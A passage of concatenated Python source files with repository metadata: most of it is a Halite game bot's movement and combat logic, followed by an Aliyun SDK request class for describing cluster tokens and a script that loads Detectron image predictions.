potential_targets.append((target, value, cells_out))
cells_out += 1
if len(potential_targets) == 0:
return
potential_targets.sort(key=lambda x: x[0].strength)
potential_targets.sort(key=lambda x: x[1] + (x[2] * 1))
# Keep only the top x% ile?
percentile = 1
cutoff = int(len(potential_targets) * percentile)
potential_targets = potential_targets[:cutoff]
remove_targets = potential_targets[cutoff:]
for t in remove_targets:
self.value_production_map[t[0].x, t[0].y] = 9999
while len(potential_targets) > 0:
if (timer() - game.start) > MAX_TURN_TIME:
return
target = potential_targets.pop(0)
success = self.attack_cell(target[0], target[2], target[2])
if success and target[2] < self.production_cells_out:
potential_targets = list(filter(lambda sq: sq[0] != target[0], potential_targets))
@timethis
def get_moves_breakthrough(self):
# Determine if we should bust through and try to open up additional lanes of attack into enemy territory
# Best to have a separate lane. so we should evaluate squares that are not next to already open channels.
# We are only looking at squares which are next to the enemy already.
if len(self.in_combat_with) == 0:
enemy_targets = [1, 2, 3, 4, 5, 6]
enemy_targets.remove(self.my_id)
enemy_targets = []
else:
enemy_targets = self.in_combat_with
potential_squares_indices = np.transpose(np.nonzero((self.border_map - self.combat_zone_map) * (self.enemy_strength_map[1] > 0)))
potential_squares = [self.squares[c[0], c[1]] for c in potential_squares_indices]
# We only want to bust through if we have a lot of strength here.
for sq in potential_squares:
attack = False
for n in sq.neighbors:
if n.owner in enemy_targets:
attack = True
break
if attack:
if self.own_strength_map[4, sq.x, sq.y] > 500 and (self.own_strength_map[4, sq.x, sq.y] > 1.5 * self.enemy_strength_map[4, sq.x, sq.y]):
self.attack_cell(sq, 1)
@timethis
def get_moves_other(self):
idle_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero((self.move_map == -1) * self.is_owned_map))]
if len(idle_squares) == 0:
return
# Move squares closer to the border first.
idle_squares.sort(key=lambda sq: sq.strength, reverse=True)
idle_squares.sort(key=lambda sq: self.distance_from_border[sq.x, sq.y])
idle_squares.sort(key=lambda sq: self.distance_from_combat_zone[sq.x, sq.y])
for sq in idle_squares:
if (timer() - game.start) > MAX_TURN_TIME:
return
if sq.strength > sq.production * self.buildup_multiplier[sq.x, sq.y] and sq.move == -1 and sq.moving_here == []:
if np.sum(self.combat_zone_map) == 0:
self.find_nearest_non_owned_border(sq)
else:
if self.distance_from_combat_zone[sq.x, sq.y] < 6 and sq.parity != game.parity:
continue
if self.enemy_strength_map[3, sq.x, sq.y] > 0 and sq.parity != game.parity:
self.make_move(sq, STILL, None)
else:
self.find_nearest_combat_zone(sq)
def distance_between(self, sq1, sq2):
dx = abs(sq1.x - sq2.x)
dy = abs(sq1.y - sq2.y)
if dx > self.w / 2:
dx = self.w - dx
if dy > self.h / 2:
dy = self.h - dy
return dx + dy
def attack_cell(self, target, max_cells_out, min_cells_out=1):
# Attempts to coordinate attack to a specific cell.
cells_out = min_cells_out
while cells_out <= max_cells_out:
# If we're trying to attack a combat zone cell, this isn't the function to do it. cancel.
if cells_out > 1 and self.combat_zone_map[target.x, target.y]:
return False
if np.sum(self.is_owned_map) <= 5 and self.near_enemy is False:
free_squares = self.is_owned_map * (self.move_map == -1)
else:
if target.strength == 0 or self.value_production_map[target.x, target.y] <= 2: # or target.production >= 5: # or self.phase == 0:
free_squares = self.is_owned_map * (self.move_map == -1)
else:
free_squares = self.is_owned_map * (self.move_map == -1) * (self.strength_map >= self.buildup_multiplier * self.production_map) * (self.moving_into_map == 0)
target_distance_matrix = self.flood_fill([target], cells_out, True)
target_distance_matrix[target_distance_matrix == -1] = 0
target_distance_matrix = target_distance_matrix * free_squares
available_strength = np.sum(self.strength_map * np.minimum(target_distance_matrix, 1))
target_distance_matrix_production = cells_out - target_distance_matrix
target_distance_matrix_production[target_distance_matrix_production == cells_out] = 0 # Cells furthest out would be moving so no production
target_distance_matrix_production = target_distance_matrix_production * free_squares
available_production = np.sum(self.production_map * target_distance_matrix_production)
if available_strength + available_production > target.strength + 0:
attacking_cells = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(target_distance_matrix > 0))]
still_cells = []
if cells_out > 1:
still_cells = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(target_distance_matrix_production > 0))]
moving_cells = list(set(attacking_cells) - set(still_cells))
for square in still_cells:
self.make_move(square, STILL, None)
still_strength = np.sum(self.strength_map * np.minimum(target_distance_matrix_production, 1))
needed_strength_from_movers = target.strength - available_production - still_strength + 1
if needed_strength_from_movers > 0:
# Handle movement here
moving_cells.sort(key=lambda x: x.production)
moving_cells.sort(key=lambda x: x.strength, reverse=True)
# There are probably ways to do this more efficiently, for now just start with the highest strength cell
# and work backwards to minimize the # of cells that need to be moved.
for square in moving_cells:
if square.strength > 0:
if cells_out == 1:
self.move_square_to_target(square, target, False)
else:
self.move_square_to_target(square, target, True)
needed_strength_from_movers -= square.strength
if needed_strength_from_movers < 0:
break
return True
else:
cells_out += 1
return False
def make_move(self, square, direction, far_target):
self.move_map[square.x, square.y] = direction
if direction == -1: # Reset the square move
if square.target is not None:
square.target.moving_here.remove(square)
self.moving_into_map[square.target.x, square.target.y] -= 1
square.target = None
square.far_target = None
square.move = -1
square.far_target = None
return
if square.move != -1:
if square.target is not None:
square.target.moving_here.remove(square)
self.moving_into_map[square.target.x, square.target.y] -= 1
square.target = None
square.far_target = None
square.move = direction
if direction != STILL:
square.target = square.neighbors[direction]
square.target.moving_here.append(square)
self.moving_into_map[square.target.x, square.target.y] += 1
square.far_target = far_target
def move_square_to_target(self, source, destination, through_friendly):
# Get the distance matrix that we will use to determine movement.
distance_matrix = self.flood_fill_until_target(source, destination, through_friendly)
source_distance = distance_matrix[source.x, source.y]
if source_distance == -1 or source_distance == 0:
# We couldn't find a path to the destination or we're trying to move STILL
return False
path_choices = []
for d in range(0, 4):
neighbor = source.neighbors[d]
if distance_matrix[neighbor.x, neighbor.y] == (source_distance - 1):
path_choices.append((d, neighbor))
# There should be at most 2 cells in path_choices
path_choices.sort(key=lambda x: x[1].production)
# Try simple resolution
for (direction, target) in path_choices:
future_strength = 0
if target.owner == self.my_id:
if target.move == -1 or target.move == STILL:
future_strength = target.strength # + target.production
for sq in target.moving_here:
future_strength += sq.strength
if future_strength + source.strength <= self.str_cap:
self.make_move(source, direction, destination)
return True
for (direction, target) in path_choices:
# Ok, can we move the cell that we are moving to:
if target.owner == self.my_id:
# Yes. We can, but is the cell staying still? If not, then we can't do anything
if target.move == STILL or target.move == -1:
# Ok, let's make sure that moving this piece actually does something.
future_strength = source.strength
for sq in target.moving_here:
future_strength += sq.strength
if future_strength <= self.str_cap:
# Ok, let's move the target square.
# Start with trying to move to the same destination as someone moving here.
self.make_move(source, direction, destination) # Queue the move up, undo if it doesn't work
n_directions = list(range(4))
n_neighbors = [(nd, target.neighbors[nd]) for nd in n_directions]
n_neighbors.sort(key=lambda x: x[1].production)
n_neighbors.sort(key=lambda x: self.distance_from_border[x[1].x, x[1].y], reverse=True)
# Ok, none of these has worked, let's try moving to a neighbor square instead then.
for n_d in n_directions:
n = target.neighbors[n_d]
if n.owner == self.my_id and self.enemy_strength_map[2, n.x, n.y] == 0:
# Can we move into this square safely?
future_n_t_strength = target.strength
if n.move == STILL or n.move == -1:
future_n_t_strength += n.strength # + n.production
for n_moving in n.moving_here:
future_n_t_strength += n_moving.strength
if future_n_t_strength <= self.str_cap:
success = self.move_square_to_target_simple(target, n, True)
if success:
return True
# TODO: Logic to attempt to capture a neutral cell if we want.
self.make_move(source, -1, None)
# Nothing to do left
return False
def move_square_to_target_simple(self, source, destination, through_friendly):
# For large distances, we can probably get away with simple movement rules.
dist_w = (source.x - destination.x) % self.w
dist_e = (destination.x - source.x) % self.w
dist_n = (source.y - destination.y) % self.h
dist_s = (destination.y - source.y) % self.h
if dist_w == 0 and dist_n == 0:
return False
ew_swap = False
ns_swap = False
w_neighbor = source.neighbors[WEST]
e_neighbor = source.neighbors[EAST]
n_neighbor = source.neighbors[NORTH]
s_neighbor = source.neighbors[SOUTH]
if dist_w < dist_e:
if through_friendly and w_neighbor.owner != self.my_id:
if e_neighbor.owner == self.my_id:
ew_move = (EAST, e_neighbor)
ew_swap = True
else:
ew_move = None
else:
ew_move = (WEST, w_neighbor)
elif dist_e < dist_w:
if through_friendly and e_neighbor.owner != self.my_id:
if w_neighbor.owner == self.my_id:
ew_move = (WEST, w_neighbor)
ew_swap = True
else:
ew_move = None
else:
ew_move = (EAST, e_neighbor)
elif dist_w == 0:
ew_move = None
elif dist_w == dist_e:
if through_friendly and (w_neighbor.owner != self.my_id or e_neighbor.owner != self.my_id):
if w_neighbor.owner != self.my_id and e_neighbor.owner != self.my_id:
ew_move = None
elif w_neighbor.owner == self.my_id and e_neighbor.owner != self.my_id:
ew_move = (WEST, w_neighbor)
else:
ew_move = (EAST, e_neighbor)
else:
# Prefer the move with lower production
if e_neighbor.production < w_neighbor.production:
ew_move = (EAST, e_neighbor)
else:
ew_move = (WEST, w_neighbor)
if dist_s < dist_n:
if through_friendly and s_neighbor.owner != self.my_id:
if n_neighbor.owner == self.my_id:
ns_move = (NORTH, n_neighbor)
ns_swap = True
else:
ns_move = None
else:
ns_move = (SOUTH, s_neighbor)
elif dist_n < dist_s:
if through_friendly and n_neighbor.owner != self.my_id:
if s_neighbor.owner == self.my_id:
ns_move = (SOUTH, s_neighbor)
ns_swap = True
else:
ns_move = None
else:
ns_move = (NORTH, n_neighbor)
elif dist_s == 0:
ns_move = None
elif dist_s == dist_n:
if through_friendly and (s_neighbor.owner != self.my_id or n_neighbor.owner != self.my_id):
if s_neighbor.owner != self.my_id and n_neighbor.owner != self.my_id:
ns_move = None
elif s_neighbor.owner == self.my_id and n_neighbor.owner != self.my_id:
ns_move = (SOUTH, s_neighbor)
else:
ns_move = (NORTH, n_neighbor)
else:
# Prefer the move with lower production
if n_neighbor.production < s_neighbor.production:
ns_move = (NORTH, n_neighbor)
else:
ns_move = (SOUTH, s_neighbor)
if ns_move is None and ew_move is None:
return False
path_choices = []
if ns_move is None:
path_choices.append(ew_move)
elif ew_move is None:
path_choices.append(ns_move)
elif ns_swap is True and ew_swap is False:
path_choices.append(ew_move)
path_choices.append(ns_move)
elif ns_swap is False and ew_swap is True:
path_choices.append(ns_move)
path_choices.append(ew_move)
else:
if ew_move[1].production < ns_move[1].production:
path_choices.append(ew_move)
path_choices.append(ns_move)
else:
path_choices.append(ns_move)
path_choices.append(ew_move)
for (direction, target) in path_choices:
future_strength = 0
if target.owner == self.my_id:
if target.move == -1 or target.move == STILL:
future_strength = target.strength # + target.production
for sq in target.moving_here:
future_strength += sq.strength
if future_strength + source.strength <= self.str_cap:
self.make_move(source, direction, destination)
return True
# Try simple resolution
for (direction, target) in path_choices:
future_strength = 0
if target.owner == self.my_id:
if target.move == -1 or target.move == STILL:
future_strength = target.strength # + target.production
for sq in target.moving_here:
future_strength += sq.strength
if future_strength + source.strength <= self.str_cap:
self.make_move(source, direction, destination)
return True
for (direction, target) in path_choices:
# Ok, can we move the cell that we are moving to:
if target.owner == self.my_id:
# Yes. We can, but is the cell staying still? If not, then we can't do anything
if target.move == STILL or target.move == -1:
# Ok, let's make sure that moving this piece actually does something.
future_strength = source.strength
for sq in target.moving_here:
future_strength += sq.strength
if future_strength <= self.str_cap:
# Ok, let's move the target square.
# Start with trying to move to the same destination as someone moving here.
self.make_move(source, direction, destination) # Queue the move up, undo if it doesn't work
n_directions = list(range(4))
n_neighbors = [(nd, target.neighbors[nd]) for nd in n_directions]
n_neighbors.sort(key=lambda x: x[1].production)
n_neighbors.sort(key=lambda x: self.distance_from_border[x[1].x, x[1].y], reverse=True)
# Ok, none of these has worked, let's try moving to a neighbor square instead then.
for n_d in n_directions:
n = target.neighbors[n_d]
if n.owner == self.my_id and self.enemy_strength_map[2, n.x, n.y] == 0:
# Can we move into this square safely?
future_n_t_strength = target.strength
if n.move == STILL or n.move == -1:
future_n_t_strength += n.strength # + n.production
for n_moving in n.moving_here:
future_n_t_strength += n_moving.strength
if future_n_t_strength <= self.str_cap:
success = self.move_square_to_target_simple(target, n, True)
if success:
return True
# TODO: Logic to attempt to capture a neutral cell if we want.
self.make_move(source, -1, None)
# Nothing to do left
return False
def find_nearest_non_owned_border(self, sq):
current_distance = self.distance_from_border[sq.x, sq.y]
if current_distance == 1:
self.make_move(sq, STILL, None)
targets = []
for n in sq.neighbors:
if self.is_owned_map[n.x, n.y]:
if self.distance_from_border[n.x, n.y] == current_distance - 1:
targets.append(n)
targets.sort(key=lambda s: self.own_strength_map[5, s.x, s.y])
for n in targets:
success = self.move_square_to_target(sq, n, True)
if success:
break
def find_nearest_combat_zone(self, sq):
current_distance = self.distance_from_combat_zone[sq.x, sq.y]
targets = []
for n in sq.neighbors:
if self.is_owned_map[n.x, n.y]:
if self.distance_from_combat_zone[n.x, n.y] == current_distance - 1:
targets.append(n)
targets.sort(key=lambda s: self.own_strength_map[7, s.x, s.y])
for n in targets:
success = self.move_square_to_target(sq, n, True)
if success:
break
def move_towards_map_old(self, sq, distance_map, through_friendly=True):
current_distance = distance_map[sq.x, sq.y]
possible_moves = []
for n in sq.neighbors:
if self.is_owned_map[n.x, n.y]:
if distance_map[n.x, n.y] == current_distance - 1:
possible_moves.append(n)
if len(possible_moves) > 0:
possible_moves.sort(key=lambda sq: sq.production)
possible_moves.sort(key=lambda sq: self.enemy_strength_map[4, sq.x, sq.y], reverse=True)
self.move_square_to_target(sq, possible_moves[0], True)
def flood_fill_until_target(self, source, destination, friendly_only):
# Does a BFS flood fill to find shortest distance from source to target.
# Starts the fill AT destination and then stops once we hit the target.
q = [destination]
distance_matrix = np.ones((self.w, self.h), dtype=int) * -1
distance_matrix[destination.x, destination.y] = 0
while len(q) > 0 and distance_matrix[source.x, source.y] == -1:
current = q.pop(0)
current_distance = distance_matrix[current.x, current.y]
for neighbor in current.neighbors:
if distance_matrix[neighbor.x, neighbor.y] == -1:
if not friendly_only or (friendly_only and neighbor.owner == self.my_id):
distance_matrix[neighbor.x, neighbor.y] = current_distance + 1
q.append(neighbor)
return distance_matrix
def flood_fill_to_border(self, sources):
q = sources
distance_matrix = np.ones((self.w, self.h)) * -1
if len(sources) == 0:
return distance_matrix
for sq in sources:
distance_matrix[sq.x, sq.y] = 0
while len(q) > 0:
c = q.pop(0)
c_dist = distance_matrix[c.x, c.y]
if c.owner == self.my_id:
for n in c.neighbors:
if distance_matrix[n.x, n.y] == -1 or distance_matrix[n.x, n.y] > (c_dist + 1):
distance_matrix[n.x, n.y] = c_dist + 1
q.append(n)
return distance_matrix
def flood_fill(self, sources, max_distance=999, friendly_only=True):
# sources is a list of Squares
q = sources
distance_matrix = np.ones((self.w, self.h)) * -1
if len(sources) == 0:
return distance_matrix
for sq in sources:
distance_matrix[sq.x, sq.y] = 0
while len(q) > 0:
c = q.pop(0)
c_dist = distance_matrix[c.x, c.y]
for n in c.neighbors:
if distance_matrix[n.x, n.y] == -1 or distance_matrix[n.x, n.y] > (c_dist + 1):
if (friendly_only and n.owner == self.my_id) or (not friendly_only and n.owner != self.my_id):
distance_matrix[n.x, n.y] = c_dist + 1
if c_dist < max_distance - 1:
q.append(n)
return distance_matrix
@timethis
def last_resort_strength_check(self):
# Calculates the projected strength map and identifies squares that are violating it.
# Ignore strength overloads due to production for now
projected_strength_map = np.zeros((self.w, self.h), dtype=int)
# We only care about our moves.
for sq in itertools.chain.from_iterable(self.squares):
if sq.owner == self.my_id:
if sq.move == -1 or sq.move == STILL:
projected_strength_map[sq.x, sq.y] += sq.strength # + sq.production
else:
dx, dy = get_offset(sq.move)
projected_strength_map[(sq.x + dx) % self.w, (sq.y + dy) % self.h] += sq.strength
# Get a list of squares that are over the cap
violation_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero((projected_strength_map > self.str_cap)))]
violation_count = len(violation_squares)
violation_squares.sort(key=lambda sq: sq.strength, reverse=True)
violation_squares.sort(key=lambda sq: self.distance_from_combat_zone[sq.x, sq.y])
for sq in violation_squares:
if (timer() - game.start) > MAX_TURN_TIME:
return
if sq.owner == self.my_id and (sq.move == -1 or sq.move == STILL):
# We can try to move this square to an neighbor.
possible_paths = []
for d in range(0, 4):
# Move to the lowest strength neighbor. this might cause a collision but we'll resolve it with multiple iterations
n = sq.neighbors[d]
if n.owner == self.my_id and self.enemy_strength_map[2, n.x, n.y] == 0:
possible_paths.append((d, n, projected_strength_map[n.x, n.y]))
else:
# Try attacking a bordering cell
if (sq.strength > (2 * n.strength)) and (n.production > 2):
possible_paths.append((d, n, n.strength + 255))
possible_paths.sort(key=lambda x: x[2])
possible_paths.sort(key=lambda x: self.distance_from_border[x[1].x, x[1].y], reverse=True)
# Force a move there
self.make_move(sq, d, n)
else:
# We aren't the problem. one of the squares that's moving here is going to collide with us.
# How do we resolve this?
options_list = []
for n in sq.neighbors:
if n.owner == self.my_id:
options_list.append((n, projected_strength_map[n.x, n.y]))
options_list.sort(key=lambda x: x[1])
# Let's try having the smallest one stay still instead
for opt in options_list:
self.make_move(opt[0], STILL, None)
# self.make_move(options_list[0][0], STILL, None)
return violation_count
@timethis
def stop_swaps(self):
# Check if two squares are swapping places for no reason.
for x in range(self.w):
for y in range(self.h):
if (timer() - game.start) > MAX_TURN_TIME:
return
if self.is_owned_map[x, y]:
s = self.squares[x, y]
if s.target is not None:
if s.target in s.moving_here:
if s.strength >= s.target.strength:
if self.distance_from_border[s.x, s.y] <= self.distance_from_border[s.target.x, s.target.y]:
if (s.strength - s.target.strength) >= 0:
self.make_move(s.target, STILL, None)
self.make_move(s, STILL, None)
@timethis
def check_parity(self):
indices = np.transpose(np.nonzero((self.is_owned_map * self.enemy_strength_map[3])))
squares = [self.squares[c[0], c[1]] for c in indices]
squares.sort(key=lambda sq: sq.strength, reverse=True)
for s in squares:
if (timer() - game.start) > MAX_TURN_TIME:
return
if (self.enemy_strength_map[2, s.x, s.y] == 0) and s.parity != game.parity and (s.move != STILL and s.move != -1):
self.make_move(s, STILL, None)
future_strength = s.strength + sum(x.strength for x in s.moving_here)
if future_strength > self.str_cap:
s.moving_here.sort(key=lambda x: x.strength)
while future_strength > 255:
future_strength -= s.moving_here[0].strength
self.make_move(s.moving_here[0], STILL, None)
elif (self.enemy_strength_map[2, s.x, s.y] > 0) and (s.move == STILL or s.move == -1):
# Try to capture a neutral cell
neutral_targets = []
friendly_targets = []
near_combat = False
for t in s.neighbors:
if t.owner == self.my_id:
friendly_targets.append(t)
else:
if s.strength > t.strength:
if t.strength == 0:
near_combat = True
neutral_targets.append(t)
friendly_targets.sort(key=lambda x: sum(y.strength for y in x.moving_here))
success = False
if near_combat:
for t in friendly_targets:
future_strength = sum(x.strength for x in t.moving_here) + t.strength if (t.move == STILL or t.move == -1) else 0
if future_strength + s.strength <= self.str_cap:
success = self.move_square_to_target_simple(s, t, True)
if success:
break
if not success:
neutral_targets.sort(key=lambda x: sum(y.strength for y in x.moving_here))
for t in neutral_targets:
future_strength = sum(x.strength for x in t.moving_here)
if future_strength + s.strength <= self.str_cap:
success = self.move_square_to_target_simple(s, t, False)
if success:
break
def overkill_check(self):
one_away_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.distance_from_combat_zone == 1))]
for sq in one_away_squares:
# Isolated squares that are near enemies can stay still.
if sq.owner == self.my_id:
if sq.is_isolated():
# Check diagonals for isolated.
diagonals = [(-1, -1), (1, 1), (-1, 1), (1, -1)]
should_still = True
for (dx, dy) in diagonals:
dsq = self.squares[(sq.x + dx) % self.w, (sq.y + dy) % self.h]
if dsq.owner == self.my_id and dsq.is_isolated() and (dsq.move == 4 or dsq.move == -1):
should_still = False
break
if should_still:
self.make_move(sq, STILL, None)
two_away_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.distance_from_combat_zone == 2))]
two_away_squares = [x for x in two_away_squares if x.owner == self.my_id and x.strength > 0]
for sq in two_away_squares:
# Check the situation in which A -> B -> 0 <- C
if sq.move != -1 and sq.move != 4:
b = sq.target
if b.move != -1 and b.move != 4:
if b.target.owner == 0 and b.target.strength == 0:
f, n, c, e = b.around()
if c == 1:
# Check Oh
oh = b.target
of, on, oc, oe = oh.around()
if oe >= 1:
# A is going to B, B is going to 0, C might be going to 0, keep A Still
e_str = self.enemy_strength_map[1, oh.x, oh.y]
if b.strength > e_str:
self.make_move(sq, STILL, None)
else:
self.make_move(b, STILL, None)
# ==============================================================================
# Square class
# ==============================================================================
class Square:
def __init__(self, game, x, y, production):
self.game = game
self.x, self.y = x, y
self.production = production
self.w, self.h = game.w, game.h
self.vertex = x * self.h + y
self.target = None
self.moving_here = []
self.far_target = None
self.parity = (x + y) % 2
def after_init_update(self):
# Should only be called after all squares in game have been initialized.
self.north = self.game.squares[(self.x + 0) % self.w, (self.y - 1) % self.h]
self.east = self.game.squares[(self.x + 1) % self.w, (self.y + 0) % self.h]
self.south = self.game.squares[(self.x + 0) % self.w, (self.y + 1) % self.h]
self.west = self.game.squares[(self.x - 1) % self.w, (self.y + 0) % self.h]
self.neighbors = [self.north, self.east, self.south, self.west] # doesn't include self
def get_neighbors(self, n=1, include_self=False):
# Returns a list containing all neighbors within n squares, excluding self unless include_self = True
assert isinstance(include_self, bool)
assert isinstance(n, int) and n > 0
if n == 1:
if not include_self:
return self.neighbors
combos = ((dx, dy) for dy in range(-n, n + 1) for dx in range(-n, n + 1) if abs(dx) + abs(dy) <= n)
return (self.game.squares[(self.x + dx) % self.w][(self.y + dy) % self.h] for dx, dy in combos if include_self or dx or dy)
def update(self, owner, strength):
# updates the square with the new owner and strength. Also resets movement variables
self.owner = owner
self.strength = strength
self.reset_move()
def reset_move(self):
# Resets the move information
# Note, the target's moving_here is NOT reset so this should really only be used if all squares are being reset.
self.move = -1
self.target = None
self.moving_here = []
self.far_target = None
def around(self):
# Returns (Friendly, Neutral > 0, Neutral == 0, enemy)
friendly = 0
neutral = 0
combat = 0
enemy = 0
for sq in self.neighbors:
if sq.owner == self.game.my_id:
friendly += 1
elif sq.owner != 0:
enemy += 1
else:
if sq.strength > 0:
neutral += 1
else:
combat += 1
return (friendly, neutral, combat, enemy)
def overkill_safe(self):
# Is it safe to move to this square??
# STILL
move_away = []
check = [self.north, self.west, self.east, self.south, self]
for n in check:
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# NORTH
move_away = []
check = [self.north.north, self.north.west, self.north.east, self.north, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# South
move_away = []
check = [self.south.south, self.south.west, self.south.east, self.south, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# West
move_away = []
check = [self.west.south, self.west.north, self.west.west, self.west, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# East
move_away = []
check = [self.east.south, self.east.north, self.east.east, self.east, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
return (True, [])
def is_isolated(self):
isolated = True
for n in self.neighbors:
if n.owner == self.owner:
isolated = False
return isolated
####################
# Helper Functions #
####################
def get_offset(direction):
return ((0, -1), (1, 0), (0, 1), (-1, 0), (0, 0))[direction]
def opposite_direction(direction):
return (direction + 2) % 4 if direction != STILL else STILL
def roll_xy(M, x, y):
return np.roll(np.roll(M, x, 0), y, 1)
def spread_n(M, n, decay=0, include_self=True):
# Takes a matrix M, and then creates an influence map by offsetting by N in every direction.
# Decay function is currently of the form exp(-decay * distance)
if include_self is True:
spread_map = np.copy(M)
else:
spread_map = np.zeros_like(M)
distance = 1
while distance <= n:
combos = get_all_d_away(distance)
decay_factor = math.exp(-decay * distance)
for c in combos:
spread_map += roll_xy(np.multiply(decay_factor, M), c[0], c[1])
distance += 1
return spread_map
def get_all_d_away(d):
combos = []
for x in range(0, d + 1):
x_vals = list(set([x, -x]))
y_vals = list(set([d - x, -(d - x)]))
combos.extend(list(itertools.product(x_vals, y_vals)))
return list(set(combos))
def rebase_map(map_a, total=True):
# Takes a map and returns a rebased version where numpy.sum(map) = self.w * self.h
# If Total = False, rebases to the # of non-zero squares
if total:
size = functools.reduce(lambda x, y: x * y, map_a.shape)
else:
size = np.sum(map_a != 0)
factor = size / np.sum(map_a)
return np.multiply(map_a, factor)
# ==============================================================================
# Functions for communicating with the Halite game environment (formerly contained in separate module networking.py
# ==============================================================================
def translate_cardinal(direction):
# Cardinal index used by the framework is:
# NORTH = 0, EAST = 1, SOUTH = 2, WEST = 3, STILL = 4
# Cardinal index used by the game is:
# STILL = 0, NORTH = 1, EAST = 2, SOUTH = 3, WEST = 4
return int((direction + 1) % 5)
def send_string(to_be_sent):
sys.stdout.write(to_be_sent + "\n")
sys.stdout.flush()
def get_string():
return sys.stdin.readline().rstrip('\n')
# ==============================================================================
# Game Loop
# ==============================================================================
def game_loop():
game.start = timer()
game.update()
if (timer() - game.start) > MAX_TURN_TIME:
return
game.get_moves()
if (timer() - game.start) > MAX_TURN_TIME:
return
game.stop_swaps()
collision_check = 998
last_collision_check = 999
while collision_check < last_collision_check:
if (timer() - game.start) > MAX_TURN_TIME:
return
last_collision_check = collision_check
collision_check = game.last_resort_strength_check()
if (timer() - game.start) > MAX_TURN_TIME:
return
game.check_parity()
collision_check = 998
last_collision_check = 999
while collision_check < last_collision_check:
if (timer() - game.start) > MAX_TURN_TIME:
return
last_collision_check = collision_check
collision_check = game.last_resort_strength_check()
game.overkill_check()
collision_check = 998
last_collision_check = 999
while collision_check < last_collision_check:
if (timer() - game.start) > MAX_TURN_TIME:
return
last_collision_check = collision_check
collision_check = game.last_resort_strength_check()
# #####################
# Game run-time code #
# #####################
logging.basicConfig(filename='logging.log', level=logging.DEBUG)
# logging.debug('your message here')
NORTH, EAST, SOUTH, WEST, STILL = range(5)
if (profile):
pr = cProfile.Profile()
pr.enable()
game = Game()
while True:
game.get_frame()
game_loop()
game.send_frame()
if profile and game.frame == 199:
pr.disable()
pr.dump_stats("test.prof")
| [
"nick@narmi.com"
] | nick@narmi.com |
0965831befd1d9b3c359c1e3361b6e2a5064d506 | ccbfc7818c0b75929a1dfae41dc061d5e0b78519 | /aliyun-openapi-python-sdk-master/aliyun-python-sdk-cs/aliyunsdkcs/request/v20151215/DescribeClusterTokensRequest.py | a005fcd3967fcf1bfce0a52277c2b2397cd22a89 | [
"Apache-2.0"
] | permissive | P79N6A/dysms_python | 44b634ffb2856b81d5f79f65889bfd5232a9b546 | f44877b35817e103eed469a637813efffa1be3e4 | refs/heads/master | 2020-04-28T15:25:00.368913 | 2019-03-13T07:52:34 | 2019-03-13T07:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RoaRequest
class DescribeClusterTokensRequest(RoaRequest):
def __init__(self):
RoaRequest.__init__(self, 'CS', '2015-12-15', 'DescribeClusterTokens')
self.set_uri_pattern('/clusters/[ClusterId]/tokens')
self.set_method('GET')
def get_ClusterId(self):
return self.get_path_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_path_param('ClusterId',ClusterId) | [
"1478458905@qq.com"
] | 1478458905@qq.com |
33c88c043e19e96f7ec08c9b8158b562e0b70726 | 3cd4902b67de144d8e6f36335e125d0548d8cf97 | /tools/detecting/detectron/DetectronDetector.py | d0414990eb597a4ad1c3d6b3ff9435d39727a628 | [
"MIT"
] | permissive | stefantaubert/imageclef-lifelog-2019 | 5d201c2a28f15f608b9b58b94ab2ecddb5201205 | ad49dc79db98a163c5bc282fb179c0f7730546b3 | refs/heads/master | 2022-10-06T12:42:30.011610 | 2022-08-29T13:35:09 | 2022-08-29T13:35:09 | 196,553,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import pickle
from src.detecting.DetectorBase import DetectorBase
from src.detecting.img_path_parser import get_paths
from src.io.paths import get_path_detectron
from src.globals import usr1
"""
I run detectron on remote machine and save the results as a dictionary with keys = image_id and values: class predictions.
This dictionary will be loaded as model.
The threshold is set to 0.5
"""
class DetectronDetector(DetectorBase):
def __init__(self):
print("Load predictions from detectron...")
self.predictions = pickle.load(open( "/tmp/pred.pkl", "rb"), encoding='latin1')
print("Preprocessing...")
paths = get_paths()
self.ids_to_paths = {}
for path in paths:
img_id = path[0]
img_path = path[1]
self.ids_to_paths[img_path] = img_id
def detect_image(self, img):
img_id = self.ids_to_paths[img]
if img_id in self.predictions:
r = self.predictions[img_id]
else:
r = []
return r
if __name__ == "__main__":
d = DetectronDetector()
csv = d.detect_images_auto(usr1)
file_name = get_path_detectron(usr=usr1)
csv.to_csv(file_name, index=False)
print("Successfully saved to", file_name) | [
"stefan.taubert@posteo.de"
] | stefan.taubert@posteo.de |
